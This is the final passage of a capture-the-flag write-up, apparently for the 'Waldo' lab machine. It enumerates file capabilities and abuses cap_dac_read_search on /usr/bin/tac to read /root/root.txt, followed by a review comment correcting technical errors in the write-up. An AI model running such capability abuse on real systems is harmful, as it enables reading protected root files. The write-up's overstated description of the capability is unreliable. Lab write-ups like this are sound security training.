+ Mar 20 10:27:59 waldo sshd[1112]: Accepted publickey for monitor from 127.0.0.1 port 55516 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
+ Mar 20 10:27:59 waldo sshd[1112]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
+ Mar 20 10:27:59 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
+ Mar 20 10:27:59 waldo systemd-logind[356]: New session 8 of user monitor.
+ Mar 20 10:30:45 waldo sshd[1121]: Received disconnect from 127.0.0.1 port 55516:11: disconnected by user
+ Mar 20 10:30:45 waldo sshd[1121]: Disconnected from 127.0.0.1 port 55516
+ Mar 20 10:30:45 waldo sshd[1112]: pam_unix(sshd:session): session closed for user monitor
+ Mar 20 10:30:45 waldo systemd-logind[356]: Removed session 8.
+ Mar 20 10:31:01 waldo sshd[1148]: Accepted publickey for monitor from 127.0.0.1 port 55518 ssh2: RSA SHA256:Kl+zDjbDx4fQ7xVvGg6V3RhjezqB1gfe2kWqm1AMD0c
+ Mar 20 10:31:01 waldo sshd[1148]: pam_unix(sshd:session): session opened for user monitor by (uid=0)
+ Mar 20 10:31:01 waldo systemd: pam_unix(systemd-user:session): session opened for user monitor by (uid=0)
+ Mar 20 10:31:01 waldo systemd-logind[356]: New session 10 of user monitor.
+
+ It looks like the application is able to read log files even though it doesn't have the SUID bit set which is abit odd since
+ the other logMonitor-0.1 binary was owned by the same user :
+
+ monitor@waldo:~/app-dev/v0.1$ ls -lash logMonitor-0.1 && ls -lash ../logMonitor
+ 16K -r-xr-x--- 1 app-dev monitor 14K May 3 2018 logMonitor-0.1
+ 16K -rwxrwx--- 1 app-dev monitor 14K Jul 24 2018 ../logMonitor
+
+ Both are owned by the same user, and the previous logMonitor binary even has more permissions than this one which is odd,
+ this is because there is something called "file capabilities" which we can check by using the command getcap :
+
+ monitor@waldo:~/app-dev/v0.1$ getcap -r logMonitor-0.1
+ logMonitor-0.1 = cap_dac_read_search+ei
+
+ This logMonitor-0.1 file has the cap_dac_read_search capability which allows it to bypass the read permission checks
+ and directory all three RWX checks, which is quite handy, but we can't use this file to read anything other than
+ the log files:
+
+ monitor@waldo:~/app-dev/v0.1$ getcap -r /* 2>/dev/null
+ /home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei
+ /usr/bin/tac = cap_dac_read_search+ei
+
+ So that's weird, apparently this can be used to read /usr/bin/tac so let's investigate it :
+
+ monitor@waldo:~/app-dev/v0.1$ file /usr/bin/tac
+ /usr/bin/tac: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1c24dbf3a64cb509bf8bde1aa4ecf04fca8959ae, stripped
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac
+ ^C
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac --help
+ Usage: /usr/bin/tac [OPTION]... [FILE]...
+ Write each FILE to standard output, last line first.
+
+ With no FILE, or when FILE is -, read standard input.
+
+ Mandatory arguments to long options are mandatory for short options too.
+ -b, --before attach the separator before instead of after
+ -r, --regex interpret the separator as a regular expression
+ -s, --separator=STRING use STRING as the separator instead of newline
+ --help display this help and exit
+ --version output version information and exit
+
+ GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
+ Full documentation at: <http://www.gnu.org/software/coreutils/tac>
+ or available locally via: info '(coreutils) tac invocation'
+
+ Interesting binary, since we can use it to write each FILE to stdout, and as we saw earlier, /usr/bin/tac has the cap_dac_read_search capabilities which
+ allows it to bypass the RWX permission checks, so let's see if we can use it to read the root flag :
+
+ monitor@waldo:~/app-dev/v0.1$ /usr/bin/tac /root/root.txt
+ 8fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ And that's it ! We have been able to print out the root flag.
+
+
+
+
+
+
+
+
+
+
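Review bot: the description of `cap_dac_read_search` at `This logMonitor-0.1 file has the cap_dac_read_search capability which allows it to bypass the read permission checks and directory all three RWX checks` (and again at `allows it to bypass the RWX permission checks` before the tac step) overstates the capability: per capabilities(7), CAP_DAC_READ_SEARCH bypasses file read permission checks and directory read and execute (search) checks only, never write; correct both sentences, since the whole escalation rests on that detail. Also `So that's weird, apparently this can be used to read /usr/bin/tac` misreads the getcap output: `/usr/bin/tac = cap_dac_read_search+ei` means tac itself carries the capability, not that logMonitor can read it, and that is the defender's point to state explicitly (a file capability on a stock coreutils binary is exactly what a periodic `getcap -r / 2>/dev/null` baseline should flag). Formatting: from `From there we are in a restricted bash (rbash)` down to `And that's it ! We have been able to print out the root flag.` the prose lines carry a leading space like the terminal output, so they will render as code; unindent them to match the rest of the file. Other fixes: the de-escaped filter `str_replace( array("../", "..\"), "", $_POST['path']);` is not valid PHP (the backslash escapes the closing quote; the second element should be `"..\\"`), and the sentence above it calls it a "str_array function filter" when it is str_replace with an array argument; `Intercept our GET request aimed at /fileRead.php` should say POST, since readFile sends a POST; the `....//` bypass deserves one sentence explaining that str_replace is a single pass, so removing `../` from `....//` leaves `../`, which is why the fix is canonicalizing the path (realpath checked against an allowed base directory) rather than stripping strings; `Requestn` is a typo; and the Alpine banner lines `See <****http://wiki.alpinelinux.org>.` and `See .` have a mangled and a dropped URL respectively.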
Conclusion
+
Here we can see the progress graph :
+

+
+
+
+
+
+
+
+
+
+
+
+
Nihilism
+
+ Until there is Nothing left.
Creative Commons Zero: No Rights Reserved
+
+
+
+
+
+
+
+
About nihilist
+
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
+
+
+
+
+
+
+
+
+
+
+
+